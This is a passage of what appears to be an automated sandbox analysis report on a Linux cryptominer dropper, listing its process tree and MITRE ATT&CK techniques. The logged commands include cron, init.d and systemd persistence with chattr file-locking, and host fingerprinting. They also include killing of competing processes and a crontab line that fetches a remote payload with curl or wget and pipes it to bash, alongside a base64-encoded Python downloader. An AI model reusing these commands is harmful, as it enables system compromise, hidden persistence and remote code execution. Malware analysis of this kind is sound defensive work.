2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
  2⤵
  - Writes file to tmp directory
  PID:2055
- - /usr/bin/id
    id -u
    3⤵
    PID:2056
- - /usr/bin/id
    id -u
    3⤵
    PID:2057
- - /usr/bin/chattr
    chattr -i -a /bin/bprofr "~/.bash_profile"
    3⤵
    - Attempts to change immutable files
    PID:2058
- - /usr/bin/rm
    rm -rf /bin/bprofr
    3⤵
    PID:2059
- - /usr/bin/sed
    sed -i /bprofr/d "~/.bash_profile"
    3⤵
    - Attempts to change immutable files
    PID:2060
- - /usr/bin/cp
    cp -f -r -- /tmp/bin.64 /bin/bprofr
    3⤵
    - Writes file to system bin folder
    PID:2061
- - /usr/bin/id
    id -u
    3⤵
    PID:2062
- - /usr/bin/chattr
    chattr +i +a /bin/bprofr "~/.bash_profile"
    3⤵
    - Attempts to change immutable files
    PID:2063
- - /usr/bin/mkdir
    mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
    3⤵
    - Reads runtime system information
    PID:2064
- - /usr/bin/chattr
    chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
    3⤵
    - Attempts to change immutable files
    PID:2065
- - /usr/bin/rm
    rm -rf /bin/crondr
    3⤵
    PID:2066
- - /usr/bin/cp
    cp -f -r -- /tmp/bin.64 /bin/crondr
    3⤵
    - Writes file to system bin folder
    PID:2067
- - /usr/bin/tee
    tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Creates/modifies Cron job
    PID:2069
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Attempts to change immutable files
    - Creates/modifies Cron job
    PID:2070
- - /usr/bin/chmod
    chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:2071
- - /usr/bin/chattr
    chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    - Attempts to change immutable files
    PID:2072
- - /usr/bin/which
    which chkconfig
    3⤵
    PID:2073
- - /usr/bin/which
    which update-rc.d
    3⤵
    PID:2074
- - /usr/bin/chattr
    chattr -i -a /etc/init.d/pwnrig /bin/initdr
    3⤵
    - Attempts to change immutable files
    PID:2075
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig disable
    3⤵
    PID:2076
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig remove
    3⤵
    PID:2077
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2078
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2078
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2078
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      Reads runtime system information
      PID:2078
- - /usr/bin/rm
    rm -rf /bin/initdr
    3⤵
    PID:2104
- - /usr/bin/cp
    cp -f -r -- /tmp/bin.64 /bin/initdr
    3⤵
    - Writes file to system bin folder
    PID:2105
- - /usr/bin/tee
    tee /etc/init.d/pwnrig
    3⤵
    - Modifies init.d
    PID:2107
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/init.d/pwnrig
    3⤵
    - Attempts to change immutable files
    - Modifies init.d
    PID:2108
- - /usr/bin/chmod
    chmod +x /etc/init.d/pwnrig /bin/initdr
    3⤵
    PID:2109
- - /usr/sbin/update-rc.d
    update-rc.d pwnrig defaults
    3⤵
    PID:2110
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2111
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2111
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2111
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:2111
- - /usr/sbin/update-rc.d
    update-rc.d pwnrig enable
    3⤵
    PID:2137
  - - /usr/local/sbin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:2138
  - - /usr/local/bin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:2138
  - - /usr/sbin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:2138
  - - /usr/bin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      Reads EFI boot settings
      PID:2138
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2139
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2139
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2139
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:2139
- - /usr/bin/chattr
    chattr +i +a /etc/init.d/pwnrig /bin/initdr
    3⤵
    - Attempts to change immutable files
    PID:2165
- - /usr/bin/which
    which systemctl
    3⤵
    PID:2166
- - /usr/bin/chattr
    chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
    3⤵
    - Attempts to change immutable files
    PID:2167
- - /usr/bin/rm
    rm -rf /bin/sysdr
    3⤵
    PID:2168
- - /usr/bin/cp
    cp -f -r -- /tmp/bin.64 /bin/sysdr
    3⤵
    - Writes file to system bin folder
    PID:2169
- - /usr/bin/tee
    tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
    3⤵
    - Modifies systemd
    PID:2171
- - /usr/bin/sed
    sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
    3⤵
    - Attempts to change immutable files
    PID:2172
- - /usr/bin/chattr
    chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
    3⤵
    - Attempts to change immutable files
    PID:2173
- - /usr/bin/systemctl
    systemctl enable pwnrige.service
    3⤵
    - Reads EFI boot settings
    PID:2174
- - /usr/bin/systemctl
    systemctl enable pwnrigl.service
    3⤵
    - Reads EFI boot settings
    PID:2200
- - /usr/bin/systemctl
    systemctl daemon-reload
    3⤵
    - Reads EFI boot settings
    - Enumerates kernel/hardware configuration
    PID:2226
- - /usr/bin/systemctl
    systemctl reload-or-restart pwnrige.service
    3⤵
    - Reads EFI boot settings
    PID:2252

/usr/bin/hostname
hostname -I
1⤵
PID:2020

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2022

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2027

/usr/bin/head
head -n 1
1⤵
PID:2026

/usr/bin/grep
grep "Port "
1⤵
PID:2025

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2024

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2036

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2035

/usr/bin/cut
cut -d: -f2
1⤵
PID:2034

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2033

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2039

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2042

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2045

/usr/bin/ss
ss -ant
1⤵
PID:2309

/usr/bin/nohup
nohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"
1⤵
PID:2310

/tmp/bin.64
/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"
1⤵
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2310
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  - Attempts to change immutable files
  PID:2351
- - /usr/bin/whoami
    whoami
    3⤵
    PID:2362
- - /usr/bin/hostname
    hostname
    3⤵
    PID:2363
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:2364
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:2381
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:2383
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2382
- - /usr/bin/id
    id -u
    3⤵
    PID:2389
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2392
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:2391
- - /usr/bin/ps
    ps x
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2390
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:2400
- - /usr/bin/id
    id -u
    3⤵
    PID:2401
- - /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    3⤵
    PID:2407
- - /usr/bin/grep
    grep -v /usr/sbin/httpd
    3⤵
    PID:2406
- - /usr/bin/grep
    grep -v -- "-bash[[:space:]]*\$"
    3⤵
    PID:2405
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2404
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2403
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
  2⤵
  PID:2414
- - /usr/bin/id
    id -u
    3⤵
    PID:2415

/usr/bin/hostname
hostname -I
1⤵
- Attempts to change immutable files
PID:2354

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2356

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2361

/usr/bin/head
head -n 1
1⤵
PID:2360

/usr/bin/grep
grep "Port "
1⤵
PID:2359

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2358

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2370

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2369

/usr/bin/cut
cut -d: -f2
1⤵
PID:2368

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2367

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2373

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2376

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2379

/usr/bin/wc
wc -l
1⤵
PID:2421

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:2420

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:2419

/usr/bin/grep
grep -v grep
1⤵
PID:2418

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:2417

/usr/bin/bash
bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
1⤵
PID:2548
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:2550

/usr/bin/ss
ss -ant
1⤵
PID:2551

/usr/bin/ss
ss -ant
1⤵
PID:2552

/usr/bin/ss
ss -ant
1⤵
PID:2553

/usr/bin/bash
bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
1⤵
PID:2560
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:2562

/usr/bin/ss
ss -ant
1⤵
PID:2563

/usr/bin/ss
ss -ant
1⤵
PID:2564

/usr/bin/ss
ss -ant
1⤵
PID:2565

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Defense Evasion

Hijack Execution Flow

Virtualization/Sandbox Evasion

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion